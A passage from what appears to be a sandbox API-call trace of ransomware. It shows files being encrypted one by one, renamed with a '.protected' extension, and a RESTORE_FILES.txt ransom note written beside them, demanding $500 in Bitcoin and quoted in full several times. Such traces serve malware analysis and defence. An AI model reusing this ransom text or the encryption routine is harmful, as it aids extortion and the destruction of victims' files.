a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.096] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.097] lstrlenA (lpString="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") returned 684 [0079.097] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.097] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.097] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.097] CloseHandle (hObject=0x164) returned 1 [0079.097] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0079.097] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0079.097] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th") returned 141 [0079.097] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0079.097] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0079.097] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*") returned 143 [0079.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.097] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.097] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.097] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\.") returned 143 [0079.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.098] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.098] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.098] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\..") returned 144 [0079.098] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.098] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") 
returned 155 [0079.098] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.098] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0079.101] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0079.101] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0079.101] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.101] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.102] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.102] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.102] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.102] CloseHandle (hObject=0x168) returned 1 [0079.102] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.protected") returned 165 [0079.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.protected")) returned 1 [0079.103] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.103] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.103] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0079.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.103] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.103] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.104] lstrlenA (lpString="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") returned 684 [0079.104] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.104] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.104] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.104] CloseHandle (hObject=0x164) returned 1 [0079.104] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.104] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0079.105] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr") returned 141 [0079.105] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0079.105] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0079.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*") returned 143 [0079.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.105] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.105] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.105] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.105] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\.") returned 143 [0079.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.105] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.105] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.105] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.105] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.105] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\..") returned 144 [0079.105] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.105] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.105] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.105] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.106] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.106] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.106] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.106] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") 
returned 155 [0079.106] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.106] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.106] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.106] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0079.106] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0079.106] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0079.106] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.106] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0079.107] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.107] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0079.107] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.108] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.108] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.108] CloseHandle (hObject=0x168) returned 1 [0079.108] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.protected") returned 165 [0079.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.protected")) returned 1 [0079.109] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.109] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0079.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.109] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.109] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.110] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.110] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.110] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.110] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
